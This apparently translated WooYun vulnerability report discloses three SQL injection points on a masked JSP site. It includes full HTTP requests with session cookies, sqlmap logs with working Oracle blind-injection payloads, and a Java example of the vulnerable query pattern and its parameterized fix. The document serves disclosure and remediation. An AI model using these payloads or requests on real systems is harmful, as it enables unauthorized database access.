WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-11-27: Details reported to the vendor, awaiting vendor handling
2015-12-01: Vendor has confirmed; details disclosed to the vendor only
2015-12-11: Details disclosed to core white hats and experts in related fields
2015-12-21: Details disclosed to regular white hats
2015-12-31: Details disclosed to intern white hats
2016-01-15: Details disclosed to the public
As titled.
0x01 Location
http://**.**.**.**/
0x02 Vulnerability details

First injection point: GET injection
GET /infoCol_list.jsp?strColId=13740498734065767&strColKind=-1&view_type=1
Injected parameter: strColKind

Second injection point: POST injection
POST /infoPic_list.jsp HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: aheiccookie=lMXGWJ5Kbd2xzvF3Kks9kG3vgSWGhGzR4W44qLG0ph6H8lNzt87h!-1028699616; JSESSIONID=xHJPWJ8Y6vNwVDDzJp2v0znVspWRDQnTdkgNwPyPPTlLWB3V42h1!1347620527; ADMINCONSOLESESSION=WVyHWJ6QGS89TYfX5XkNQGC2n6299kTJvTBYHQp8LJqqwtvpZfcN!-1028699616; publicinquiryurls=http://**.**.**.**/services/uddi/inquiryapi!IBM|http://**.**.**.**/services/uddi/v2beta/inquiryapi!IBM V2|http://**.**.**.**/inquire!Microsoft|http://**.**.**.**/glue/inquire/uddi!XMethods|; privateinquiryurls=1; privatepublishurls=1; CNZZDATA1000303084=205775825-1448358329-http%253A%252F%252F**.**.**.**%252F%7C1448358329; _gscu_67873558=48360572fynngr16; _gscs_67873558=48360572c1erfx16|pv:1; _gscbrs_67873558=1; pageFontSize=16; contrastState=0; textModeState=0; guidesState=0; toolBarState=1; HMACCOUNT=D8E01DEA126DAFA2; Hm_lvt_fbf0ab4ef4d5dbed19698e0d0491dd4b=1448360885,1448360952,1448361231,1448361326; Hm_lpvt_fbf0ab4ef4d5dbed19698e0d0491dd4b=1448361326
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

frmSch=1&keyName=strSource&keyValue=-1&PageSizeIndex=2&strColId=1304408833625000
Injected parameter: keyValue

Third injection point: POST injection
POST /info_list.jsp HTTP/1.1
Content-Length: 147
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: aheiccookie=lMXGWJ5Kbd2xzvF3Kks9kG3vgSWGhGzR4W44qLG0ph6H8lNzt87h!-1028699616; JSESSIONID=xHJPWJ8Y6vNwVDDzJp2v0znVspWRDQnTdkgNwPyPPTlLWB3V42h1!1347620527; ADMINCONSOLESESSION=WVyHWJ6QGS89TYfX5XkNQGC2n6299kTJvTBYHQp8LJqqwtvpZfcN!-1028699616; publicinquiryurls=http://**.**.**.**/services/uddi/inquiryapi!IBM|http://**.**.**.**/services/uddi/v2beta/inquiryapi!IBM V2|http://**.**.**.**/inquire!Microsoft|http://**.**.**.**/glue/inquire/uddi!XMethods|; privateinquiryurls=1; privatepublishurls=1; CNZZDATA1000303084=205775825-1448358329-http%253A%252F%252F**.**.**.**%252F%7C1448358329; _gscu_67873558=48360572fynngr16; _gscs_67873558=48360572c1erfx16|pv:1; _gscbrs_67873558=1; pageFontSize=16; contrastState=0; textModeState=0; guidesState=0; toolBarState=1; HMACCOUNT=D8E01DEA126DAFA2; Hm_lvt_fbf0ab4ef4d5dbed19698e0d0491dd4b=1448360885,1448360952,1448361231,1448361326; Hm_lpvt_fbf0ab4ef4d5dbed19698e0d0491dd4b=1448361326
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

frmSch=1&keyName=strMasTitle&keyValue=-1&PageSizeIndex=2&strColId=13739392833284153
Injected parameter: keyValue

0x03 Test tool: sqlmap
First injection point
---
Place: GET
Parameter: strKeyword
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: strColId=1304409675750001&strKeyword=%' AND 1234=1234 AND '%'='&strLinkColId=&view_type=0

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: strColId=1304409675750001&strKeyword=%' AND 8103=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(100)||CHR(90)||CHR(70),5) AND '%'='&strLinkColId=&view_type=0
---
[21:14:24] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
[21:14:24] [INFO] fetching current user
[21:14:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:14:24] [INFO] retrieved: you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n]
[21:14:27] [WARNING] reflective value(s) found and filtering out
[21:14:30] [WARNING] time-based comparison requires larger statistical model, please wait.......................
[21:14:39] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[21:14:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user: None
[21:14:42] [INFO] fetching current database
[21:14:42] [INFO] retrieved:
[21:14:46] [INFO] retrieved:
[21:14:49] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): None
[21:14:49] [INFO] testing if current user is DBA
current user is DBA: False
[21:14:49] [INFO] fetching database users password hashes
[21:14:49] [INFO] fetching database users
[21:14:49] [INFO] fetching number of database users
[21:14:49] [INFO] retrieved:
[21:14:51] [INFO] retrieved:
[21:14:52] [CRITICAL] unable to retrieve the number of database users
[21:14:52] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[21:14:52] [INFO] fetching database (schema) names
[21:14:52] [INFO] fetching number of databases
[21:14:52] [INFO] retrieved:
[21:14:54] [INFO] retrieved:
[21:14:56] [ERROR] unable to retrieve the number of databases
[21:14:56] [INFO] falling back to current database
[21:14:56] [INFO] fetching current database
[21:14:56] [INFO] retrieved:
[21:14:59] [INFO] retrieved:
[21:15:04] [CRITICAL] unable to retrieve the database names
Second injection point
---
Place: POST
Parameter: keyValue
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: frmSch=1&keyName=strSource&keyValue=-1%' AND 9316=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(68)||CHR(119)||CHR(68),5) AND '%'='&PageSizeIndex=2&strColId=1304409675750001&strColKind=&strKeyword=&strLinkColId=
---
[21:47:30] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
[21:47:30] [INFO] fetching current user
[21:47:30] [INFO] resumed: \x05\x05
current user: ''
[21:47:30] [INFO] fetching current database
[21:47:30] [INFO] resumed: \x05\x05
[21:47:30] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): ''
[21:47:30] [INFO] testing if current user is DBA
current user is DBA: False
[21:47:30] [INFO] fetching database users password hashes
[21:47:30] [INFO] fetching database users
[21:47:30] [INFO] fetching number of database users
[21:47:30] [WARNING] time-based comparison requires larger statistical model, plyou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] ..............................
[21:47:47] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[21:47:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[21:47:49] [INFO] retrieved:
[21:47:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:47:49] [CRITICAL] unable to retrieve the number of database users
[21:47:49] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[21:47:49] [INFO] fetching database (schema) names
[21:47:49] [INFO] fetching number of databases
[21:47:51] [INFO] retrieved:
[21:47:51] [ERROR] unable to retrieve the number of databases
[21:47:51] [INFO] falling back to current database
[21:47:51] [INFO] fetching current database
available databases [1]:
[*]
Third injection point
---
Place: POST
Parameter: keyValue
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: frmSch=1&keyName=strMasTitle&keyValue=-1%' AND 9830=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(120)||CHR(109)||CHR(98),5) AND '%'='&PageSizeIndex=2&strColId=13739392833284153
---
[21:56:55] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1, Nginx
back-end DBMS: Oracle
[21:56:55] [INFO] fetching current user
[21:56:55] [WARNING] time-based comparison requires larger statistical model, plyou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] ..............................
[21:57:09] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[21:57:11] [INFO] retrieved:
[21:57:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user: None
[21:57:11] [INFO] fetching current database
[21:57:12] [INFO] retrieved:
[21:57:12] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): None
[21:57:12] [INFO] testing if current user is DBA
current user is DBA: False
[21:57:12] [INFO] fetching database users password hashes
[21:57:12] [INFO] fetching database users
[21:57:12] [INFO] fetching number of database users
[21:57:13] [INFO] retrieved:
[21:57:13] [CRITICAL] unable to retrieve the number of database users
[21:57:13] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[21:57:13] [INFO] fetching database (schema) names
[21:57:13] [INFO] fetching number of databases
[21:57:14] [INFO] retrieved:
[21:57:14] [ERROR] unable to retrieve the number of databases
[21:57:14] [INFO] falling back to current database
[21:57:14] [INFO] fetching current database
[21:57:16] [INFO] retrieved:
[21:57:16] [CRITICAL] unable to retrieve the database names
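All three injection points share one shape: a user-controlled filter value (strColKind, keyValue) reaches an Oracle query as part of the SQL text, and in the two POST cases the request also chooses the column to search (keyName=strSource or strMasTitle). The Java fragment below is an added remediation example written for this report; it is not code from the affected site, whose source is not included here. It shows the concatenating pattern that produces this bug class beside a hardened version that binds the value with a PreparedStatement and maps keyName through an allowlist, because a column name cannot be bound as a parameter. The table and column names (INFO_LIST, STR_COL_ID, STR_SOURCE, STR_MAS_TITLE) and the DataSource are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Map;
import javax.sql.DataSource;

public class InfoListSearch {
    // Assumed table name; the report does not include the application's schema.
    private static final String TABLE = "INFO_LIST";

    // keyName selects the column to search. An identifier cannot be bound with '?',
    // so the request value is mapped to a fixed identifier through an allowlist
    // (assumed column names; Map.of needs Java 9+).
    private static final Map<String, String> SEARCHABLE_COLUMNS = Map.of(
            "strSource", "STR_SOURCE",
            "strMasTitle", "STR_MAS_TITLE");

    private final DataSource ds;

    public InfoListSearch(DataSource ds) {
        this.ds = ds;
    }

    /** Vulnerable pattern, shown for contrast: every request parameter lands in the SQL text. */
    public static String buildQueryUnsafe(String strColId, String keyName, String keyValue) {
        return "SELECT * FROM " + TABLE
                + " WHERE STR_COL_ID = '" + strColId + "'"
                + " AND " + keyName + " LIKE '%" + keyValue + "%'";
    }

    /** Hardened version: fixed SQL text, allowlisted column, bound values. */
    public int countMatches(String strColId, String keyName, String keyValue) throws SQLException {
        String column = SEARCHABLE_COLUMNS.get(keyName);
        if (column == null) {
            throw new IllegalArgumentException("keyName is not a searchable column");
        }

        // Every strColId in the report is a plain integer; reject anything else before it reaches SQL.
        long colId;
        try {
            colId = Long.parseLong(strColId);
        } catch (NumberFormatException e) {
            throw new IllegalArgumentException("strColId must be numeric");
        }

        // Binding stops injection; escaping LIKE metacharacters additionally makes
        // '%' and '_' in the user value match literally instead of acting as wildcards.
        String escaped = keyValue.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_");
        String pattern = "%" + escaped + "%";

        String sql = "SELECT COUNT(*) FROM " + TABLE
                + " WHERE STR_COL_ID = ? AND " + column + " LIKE ? ESCAPE '\\'";
        try (Connection c = ds.getConnection();
             PreparedStatement ps = c.prepareStatement(sql)) {
            ps.setLong(1, colId);
            ps.setString(2, pattern);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getInt(1) : 0;
            }
        }
    }
}
```

The sqlmap runs above stall while enumerating users and schemas, and report that the database user is not a DBA; neither fact reduces the severity, since the time-based blind technique still confirms that the injected expression is evaluated by the Oracle backend. The fix is to remove string concatenation from every query these three JSP pages build, not to tune the database account.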
Severity: High
Vulnerability rank: 11
Confirmation time: 2015-12-01 15:23
CNVD confirmed and reproduced the described vulnerability; it has been forwarded via CNCERT to the Anhui branch center, which will coordinate remediation with the website's operating organization.
None yet